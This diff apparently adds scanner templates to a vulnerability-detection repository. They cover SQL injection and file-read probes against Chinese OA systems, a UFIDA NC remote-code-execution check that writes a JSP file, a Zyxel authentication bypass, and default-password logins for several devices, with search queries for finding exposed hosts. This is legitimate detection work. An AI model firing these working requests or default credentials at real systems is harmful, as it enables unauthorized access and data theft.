Merge pull request #7997 from SleepingBag945/some_tps

Added 124 Templates

http/cnvd/2021/CNVD-2021-33202.yaml

@@ -0,0 +1,36 @@
+id: CNVD-2021-33202
+
+info:
+  name: OA E-Cology LoginSSO.jsp - SQL Injection
+  author: SleepingBag945
+  severity: high
+  description: |
+    e-cology is an OA office system specially produced for large and medium-sized enterprises. It supports simultaneous office work on PC, mobile and WeChat terminals. There is a SQL injection vulnerability in Panwei e-cology. An attacker could exploit this vulnerability to obtain sensitive information.
+  reference:
+    - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/oa/%E6%B3%9B%E5%BE%AEOA/%E6%B3%9B%E5%BE%AEOA%20E-Cology%20LoginSSO.jsp%20SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%20CNVD-2021-33202.md
+    - https://www.cnblogs.com/0day-li/p/14637680.html
+  metadata:
+    max-request: 1
+    verified: true
+    fofa-query: app="泛微-协同办公OA"
+  tags: cnvd,cnvd2021,e-cology,sqli
+
+variables:
+  num: "999999999"
+
+http:
+  - raw:
+      - |
+        GET /upgrade/detail.jsp/login/LoginSSO.jsp?id=1%20UNION%20SELECT%20md5({{num}})%20as%20id%20from%20HrmResourceManager HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - '{{md5(num)}}'
+
+      - type: status
+        status:
+          - 200

http/cnvd/2022/CNVD-2022-43245.yaml

@@ -0,0 +1,41 @@
+id: CNVD-2022-43245
+
+info:
+  name: Weaver OA XmlRpcServlet - Arbitary File Read
+  author: SleepingBag945
+  severity: high
+  description: |
+    e-office is a standard collaborative mobile office platform. Ltd. e-office has an arbitrary file reading vulnerability, which can be exploited by attackers to obtain sensitive information.
+  metadata:
+    max-request: 1
+    fofa-query: app="泛微-协同办公OA"
+    verified: true
+  tags: cnvd,cnvd2022,weaver,e-office,oa,lfi
+
+http:
+  - raw:
+      - |
+        POST /weaver/org.apache.xmlrpc.webserver.XmlRpcServlet HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/xml
+
+        <?xml version="1.0" encoding="UTF-8"?><methodCall>
+        <methodName>WorkflowService.getAttachment</methodName>
+        <params><param><value><string>/etc/passwd</string>
+        </value></param></params></methodCall>
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "<methodResponse><params><param><value><base64>"
+
+      - type: word
+        part: header
+        words:
+          - "text/xml"
+
+      - type: status
+        status:
+          - 200

http/cnvd/2023/CNVD-C-2023-76801.yaml

@@ -0,0 +1,30 @@
+id: CNVD-C-2023-76801
+
+info:
+  name: UFIDA NC uapjs - RCE vulnerability
+  author: SleepingBag945
+  severity: critical
+  description: There is an arbitrary method calling vulnerability in UFIDA NC and NCC systems. By exploiting the vulnerability through uapjs (jsinvoke), dangerous methods can be called to cause attacks.
+  tags: cvnd,cvnd2023,yonyou,rce
+
+http:
+  - raw:
+      - |
+        POST /uapjs/jsinvoke/?action=invoke HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded;charset=UTF-8
+
+        {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig",
+        "parameterTypes":["java.lang.Object","java.lang.String"],
+        "parameters":["{{randstr_2}}","webapps/nc_web/{{randstr_1}}.jsp"]}
+
+      - |
+        GET /{{randstr_1}}.jsp HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - status_code_1 == 200
+          - status_code_2 == 200 && contains(body_2,"{{randstr_2}}")
+        condition: and

http/cves/2022/CVE-2022-0342.yaml

@@ -0,0 +1,40 @@
+id: CVE-2022-0342
+
+info:
+  name: Zyxel - Authentication Bypass
+  author: SleepingBag945
+  severity: critical
+  description: |
+     An authentication bypass vulnerability in the CGI program of Zyxel USG/ZyWALL series firmware versions 4.20 through 4.70, USG FLEX series firmware versions 4.50 through 5.20, ATP series firmware versions 4.32 through 5.20, VPN series firmware versions 4.30 through 5.20, and NSG series firmware versions V1.20 through V1.33 Patch 4, which could allow an attacker to bypass the web authentication and obtain administrative access of the device.
+  reference:
+    - https://github.com/gobysec/GobyVuls/blob/3dbd252ebd78dfadf3fa6d99abfbbba79908d6e3/CVE-2022-0342.md?plain=1
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-0342
+  metadata:
+    max-request: 1
+    verified: true
+    fofa-query: body="/2FA-access.cgi" && body="zyxel zyxel_style1"
+  tags: cve,cve2022,zyxel,auth-bypass,router
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/cgi-bin/export-cgi?category=config&arg0=startup-config.conf"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "interface-name"
+          - "saved at"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "text/zyxel"
+          - "attachment; filename="
+        condition: and
+
+      - type: status
+        status:
+          - 200

http/default-logins/d-link/dlink-centralized-default-login.yaml

@@ -0,0 +1,49 @@
+id: dlink-centralized-default-login
+
+info:
+  name: D-Link AC Centralized Management System - Default Login
+  author: SleepingBag945
+  severity: high
+  description: |
+    D-Link AC Centralized Management System default login credentials were discovered.
+  metadata:
+    max-request: 1
+    verified: true
+    fofa-query: title="AC集中管理平台" && body="D-Link路由器管理页"
+  tags: default-login,dlink
+
+http:
+  - raw:
+      - |
+        POST /login.cgi  HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        user={{username}}&password={{password}}
+
+    attack: pitchfork
+    payloads:
+      username:
+        - admin
+      password:
+        - admin
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code_1 == 200 && !contains(body_1,"flag=0")'
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "Set-Cookie"
+          - "ac_userid"
+        condition: and
+
+      - type: word
+        part: body
+        words:
+          - "window.open"
+        condition: and

http/default-logins/o2oa/o2oa-default-login.yaml

@@ -0,0 +1,50 @@
+id: o2oa-default-login
+
+info:
+  name: O2OA - Default Login
+  author: SleepingBag945
+  severity: high
+  description: |
+    O2OA is an open source and free enterprise and team office platform. It provides four major platforms portal management, process management, information management, and data management. It integrates many functions such as work reporting, project collaboration, mobile OA, document sharing, process approval, and data collaboration. Meet various management and collaboration needs of enterprises.
+  metadata:
+    max-request: 1
+    shodan-query: title=="O2OA"
+    verified: true
+  tags: o2oa,default-login
+
+http:
+  - raw:
+      - |
+        POST /x_organization_assemble_authentication/jaxrs/authentication/captcha HTTP/1.1
+        Host: {{Hostname}}
+        Cookie: x-token=anonymous
+        Authorization: anonymous
+        Accept: text/html,application/json,*/*
+        Content-Type: application/json; charset=UTF-8
+
+        {"credential":"{{username}}","password":"{{password}}"}
+
+    payloads:
+      username:
+        - 'xadmin'
+      password:
+        - 'o2'
+    attack: pitchfork
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: body
+        words:
+          - "\"type\": \"success\""
+          - "distinguishedName"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "application/json"
+
+      - type: status
+        status:
+          - 200

http/default-logins/others/aruba-instant-default-login.yaml

@@ -0,0 +1,40 @@
+id: aruba-instant-default-login
+
+info:
+  name: Aruba Instant - Default Login
+  author: SleepingBag945
+  severity: high
+  description: |
+    Aruba Instant is an AP device. The device has a default password, and attackers can control the entire platform through the default password admin/admin vulnerability, and use administrator privileges to operate core functions.
+  reference:
+    - https://www.192-168-1-1-ip.co/aruba-networks/routers/179/#:~:text=The%20default%20username%20for%20your,control%20panel%20of%20your%20router.
+  metadata:
+    max-request: 1
+    verified: true
+    fofa-query: body="jscripts/third_party/raphael-treemap.min.js" || body="jscripts/third_party/highcharts.src.js"
+  tags: aruba,default-login
+
+http:
+  - raw:
+      - |
+        POST /swarm.cgi  HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        opcode=login&user={{username}}&passwd={{password}}&refresh=false&nocache=0.17699820340903838
+
+    attack: pitchfork
+    payloads:
+      username:
+        - admin
+      password:
+        - admin
+
+    host-redirects: true
+    cookie-reuse: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code_1 == 200'
+          - 'contains(body_1,"name=\"sid") && contains(body_1,"true\">Admin")'
+        condition: and

http/default-logins/others/ciphertrust-default-login.yaml

@@ -0,0 +1,40 @@
+id: ciphertrust-default-login
+
+info:
+  name: Ciphertrust - Default Login
+  author: SleepingBag945
+  severity: high
+  description: |
+    Attackers can control the entire platform through the default password （initpass） vulnerability, and use administrator privileges to operate core functions.
+  reference:
+    - https://www.thalesdocs.com/ctp/cm/2.6/get_started/deployment/initial-password/index.html#:~:text=The%20username%20of%20the%20initial,to%20%22admin%22%20in%20lowercase.
+  metadata:
+    max-request: 1
+    verified: true
+    fofa-query: cert="Ciphertrust" || fid="yHV5+ZZGMu0="
+  tags: default-login,ciphertrust
+
+http:
+  - raw:
+      - |
+        POST /api/v1/auth/tokens/  HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/json
+
+        {"username":"{{username}}","connection":"local_account","password":"{{password}}","grant_type":"password","refresh_token_revoke_unused_in":30,"cookies":true,"labels":["web-ui"]}
+
+    attack: pitchfork
+    payloads:
+      username:
+        - admin
+      password:
+        - admin
+
+    host-redirects: true
+    cookie-reuse: true
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code_1 == 401'
+          - 'contains(body_1,"code") && contains(body_1,"message\":\"Password change required")'
+        condition: and

http/default-logins/others/cnzxsoft-default-login.yaml

@@ -0,0 +1,37 @@
+id: cnzxsoft-default-login
+
+info:
+  name: Cnzxsoft System - Default Login
+  author: SleepingBag945
+  severity: high
+  description: |
+    Cnzxsoft Golden Shield Information Security Management System has a default weak password.
+  metadata:
+    max-request: 1
+    fofa-query: 'title=="中新金盾信息安全管理系统"'
+    verified: true
+  tags: default-login,cnzxsoft
+
+http:
+  - raw:
+      - |
+        POST /?q=common/login  HTTP/1.1
+        Host: {{Hostname}}
+        Cookie: check_code=ptbh
+        Content-Type: application/x-www-form-urlencoded
+
+        name={{username}}&password={{password}}&checkcode=ptbh&doLoginSubmit=1
+
+    payloads:
+      username:
+        - 'admin'
+      password:
+        - 'zxsoft1234!@#$'
+    attack: pitchfork
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+          - 'contains(body,"1") && contains(header,"ZXSOFT_JDIS_USR_NAME=deleted") && !contains(body_1,"userpwd_error")'
+        condition: and